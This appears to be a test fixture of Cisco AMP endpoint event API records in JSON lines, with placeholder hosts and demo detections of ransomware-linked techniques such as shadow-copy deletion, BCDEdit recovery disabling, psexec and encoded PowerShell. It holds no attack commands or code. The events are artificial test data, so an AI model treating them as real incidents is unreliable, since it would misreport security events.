While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.","short_description":"W32.Bitsadmin.ioc"},"file":{"disposition":"Clean","file_name":"bitsadmin.exe","file_path":"/C:/Windows/System32/bitsadmin.exe","identity":{"sha256":"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00"},"parent":{"disposition":"Clean","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739846959000,"timestamp":1610618750,"timestamp_nanoseconds":846943000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. 
This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.","short_description":"W32.WScriptLaunchedZippedJS.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576726048000300,"timestamp":1610618696,"timestamp_nanoseconds":48000000,"date":"2021-01-14T10:04:56+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618696,"start_date":"2021-01-14T10:04:56+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. 
Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"/C:/windows/system32/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576727672000300,"timestamp":1610618689,"timestamp_nanoseconds":672000000,"date":"2021-01-14T10:04:49+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610618689,"start_date":"2021-01-14T10:04:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. 
Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.","short_description":"W32.BCDEditDisableRecovery.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/windows/system32/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458617561791000300,"timestamp":1610618620,"timestamp_nanoseconds":791000000,"date":"2021-01-14T10:03:40+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618620,"start_date":"2021-01-14T10:03:40+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A file containing a benign extension prior to the .exe extension was executed. 
This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.","short_description":"W32.FakeExtensionExec.RET"},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"/c:/users/rsteadman/downloads/report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":460392585524661250,"timestamp":1610618215,"timestamp_nanoseconds":615000000,"date":"2021-01-14T09:56:55+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618215,"start_date":"2021-01-14T09:56:55+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The psexec utility was executed as admin.","short_description":"W32.PsexecAsAdmin.ioc"},"file":{"disposition":"Clean","file_name":"PsExec.exe","file_path":"file:///C%3A/share%24/PsExec.exe","identity":{"sha256":"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef"},"parent":{"disposition":"Clean","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610611000,"timestamp_nanoseconds":758406329,"date":"2021-01-14T07:56:40+00:00","event_type":"File Fetch 
Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136035192884000,"timestamp":1610603346,"timestamp_nanoseconds":403000000,"date":"2021-01-14T05:49:06+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610603346,"start_date":"2021-01-14T05:49:06+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. 
In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"},"parent":{"disposition":"Clean","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515350231459808800,"timestamp":1610584664,"timestamp_nanoseconds":0,"date":"2021-01-14T00:37:44+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610584030,"timestamp_nanoseconds":579890366,"date":"2021-01-14T00:27:10+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583671182384431000,"timestamp":1610582528,"timestamp_nanoseconds":614000000,"date":"2021-01-14T00:02:08+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":695000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":691000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":684000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":682000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960","sha1":"5faebef3bb880489195e80e6656ccf442ff7123b","md5":"84b6f7be5370c1998886214790c6892b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15152998206589,"timestamp":1610534253,"timestamp_nanoseconds":0,"date":"2021-01-13T10:37:33+00:00","event_type":"Vulnerable Application 
Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610534253,"start_date":"2021-01-13T10:37:33+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"WINWORD.EXE","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"},"parent":{"disposition":"Clean","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2013","cve":"CVE-2014-0260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260"},{"cve":"CVE-2014-1761","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761"},{"cve":"CVE-2014-6357","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357"},{"cve":"CVE-2015-0085","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085"},{"cve":"CVE-2015-0086","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086"},{"cve":"CVE-2015-1641","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641"},{"cve":"CVE-2015-1650","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650"},{"cve":"CVE-2015-1682","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682"},{"cve":"CVE-2015-2379","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379"},{"cve":"CVE-2015-2380","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vuln
